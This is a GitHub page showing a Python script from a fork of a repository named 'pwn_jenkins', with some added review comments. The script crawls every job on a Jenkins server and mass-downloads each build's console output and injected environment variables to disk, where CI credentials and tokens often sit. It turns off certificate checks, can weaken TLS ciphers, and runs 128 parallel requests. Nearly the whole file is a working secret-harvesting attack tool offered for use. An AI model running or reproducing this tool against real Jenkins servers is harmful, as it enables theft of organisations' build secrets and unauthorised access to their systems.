forked from gquere/pwn_jenkins
-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathjenkins_dump_builds.py
executable file
·133 lines (102 loc) · 4.18 KB
/
jenkins_dump_builds.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
#!/usr/bin/env python3
import argparse
import concurrent.futures
import json
import os
import sys

import requests
import urllib3
# SUPPRESS WARNINGS ############################################################
# Every request below is sent with verify=False (self-signed Jenkins certs are
# common), so silence urllib3's per-request InsecureRequestWarning spam.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# DOWNGRADE SSL ################################################################
from requests.packages.urllib3.contrib import pyopenssl
def downgrade_ssl():
    """Restrict TLS ciphers to RSA key exchange (no DH), for old/odd Jenkins TLS stacks.

    Mutates module-level defaults in both the pyopenssl contrib module and
    urllib3's ssl_ helper so every subsequent connection uses the reduced list.
    NOTE(review): these attribute paths are internal to requests/urllib3 and
    were removed in newer urllib3 releases — confirm against the pinned version.
    """
    pyopenssl.DEFAULT_SSL_CIPHER_LIST = 'HIGH:RSA:!DH'
    requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'HIGH:RSA:!DH'
# CONSTANTS ####################################################################
OUTPUT_DIR = './output/'          # dump destination; overridden by -o/--output-dir
RECOVER_LAST_BUILD_ONLY = False   # -l/--last: keep only the newest build of each job
RECOVER_FROM_FAILURE = False      # -r: skip jobs whose output directory already exists
DEBUG = False                     # when True, print_debug() echoes raw API responses
BUILD_LIST = []                   # build URLs gathered by dump_jobs(), dumped in main
# UTILS ########################################################################
def print_debug(data):
    """Print *data* only when the module-level DEBUG flag is enabled."""
    # Plain truthiness instead of 'DEBUG is True' (PEP 8: never compare
    # booleans with 'is'/'=='). Behavior is identical for the bool flag.
    if DEBUG:
        print(data)
def create_dir(path):
    """Create *path* (including parents) if it does not already exist.

    Uses makedirs(exist_ok=True) instead of the original exists()-then-makedirs
    pattern, which was TOCTOU-racy: dump_build() runs in a 128-thread pool, and
    two workers checking the same missing directory would both call makedirs()
    and one would crash with FileExistsError.
    """
    os.makedirs(path, exist_ok=True)
# SAVERS #######################################################################
def dump_to_disk(url, consoleText, envVars):
    """Save one build's console log and env-var dump under OUTPUT_DIR.

    The output directory mirrors the build URL's path relative to BASE_URL
    (presumably the URL ends with '/', so 'consoleText'/'envVars' land inside it).
    """
    target = OUTPUT_DIR + url.replace(BASE_URL, '')
    create_dir(target)
    # Write both artifacts with the same mode the rest of the file uses.
    for filename, payload in (('consoleText', consoleText), ('envVars', envVars)):
        with open(target + filename, 'w+') as fh:
            fh.write(payload)
def job_was_dumped(url):
    """Return True when this job URL already has an output directory on disk."""
    return os.path.exists(OUTPUT_DIR + url.replace(BASE_URL, ''))
# DUMPERS ######################################################################
def dump_jobs(url):
    """Recursively walk the Jenkins job tree rooted at *url*.

    Appends every discovered build URL to the module-level BUILD_LIST.
    Terminates the process on authentication/permission failures.
    Honors RECOVER_FROM_FAILURE (skip jobs already on disk) and
    RECOVER_LAST_BUILD_ONLY (keep only the first listed build per job).
    """
    r = SESSION.get(url + '/api/json/', verify=False, auth=AUTH, timeout=20)
    # Jenkins signals auth problems in the body text, so sniff it before parsing.
    # sys.exit(1) replaces the builtin exit(), which only exists when the
    # site module is loaded (e.g. not under `python -S` or some frozen builds).
    if 'Authentication required' in r.text:
        print('[ERROR] This Jenkins needs authentication')
        sys.exit(1)
    if 'Invalid password/token' in r.text:
        print('[ERROR] Invalid password/token for user')
        sys.exit(1)
    if 'missing the Overall/Read permission' in r.text:
        print('[ERROR] User has no read permission')
        sys.exit(1)
    response = json.loads(r.text)
    print_debug(response)
    # Folders expose nested 'jobs': recurse into each child job.
    if 'jobs' in response:
        for job in response['jobs']:
            if RECOVER_FROM_FAILURE and job_was_dumped(job['url']):
                continue  # already dumped by a previous run
            try:
                dump_jobs(job['url'])
            except requests.exceptions.ReadTimeout:
                print('[ERROR] Gave up on job {} because of a timeout (server is probably busy)'.format(job['name']))
    # Leaf jobs expose 'builds'; collect their URLs for the dump phase.
    if 'builds' in response:
        for build in response['builds']:
            BUILD_LIST.append(build['url'])
            # Truthiness instead of '== True' (PEP 8).
            if RECOVER_LAST_BUILD_ONLY:
                break
def dump_build(url):
    """Fetch one build's console log and injected env vars, then persist both."""
    console = SESSION.get(url + '/consoleText', verify=False, auth=AUTH, timeout=20).text
    env = SESSION.get(url + '/injectedEnvVars/api/json', verify=False, auth=AUTH, timeout=20).text
    dump_to_disk(url, console, env)
# MAIN #########################################################################
parser = argparse.ArgumentParser(description = 'Dump all available info from Jenkins')
# NOTE(review): nargs='+' accepts several URLs but only args.url[0] is used below.
parser.add_argument('url', nargs='+', type=str)
parser.add_argument('-u', '--user', type=str)
parser.add_argument('-p', '--password', type=str)
parser.add_argument('-o', '--output-dir', type=str)
parser.add_argument('-d', '--downgrade_ssl', action='store_true', help='Downgrade SSL to use RSA')
parser.add_argument('-l', '--last', action='store_true', help='Dump only the last build of each job')
parser.add_argument('-r', '--recover_from_failure', action='store_true', help='Recover from server failure, skip all existing directories')
args = parser.parse_args()
# HTTP Basic auth pair for requests, or None for anonymous access.
if args.user and args.password:
    AUTH = (args.user, args.password)
else:
    AUTH = None
BASE_URL = args.url[0]
# Rebind the module-level defaults from CLI flags; the functions above read
# these globals, so all of this must run before dump_jobs()/dump_build().
if args.output_dir:
    OUTPUT_DIR = args.output_dir + '/'
if args.downgrade_ssl:
    downgrade_ssl()
if args.last:
    RECOVER_LAST_BUILD_ONLY = True
if args.recover_from_failure:
    RECOVER_FROM_FAILURE = True
# One shared Session: connection pooling reused by every worker thread.
SESSION = requests.session()
print('[+] Getting a list of jobs and builds')
dump_jobs(BASE_URL)
print('[+] Dumping gathered builds')
# Phase 2: BUILD_LIST was filled sequentially above; dump builds concurrently.
with concurrent.futures.ThreadPoolExecutor(max_workers=128) as executor:
    executor.map(dump_build, BUILD_LIST)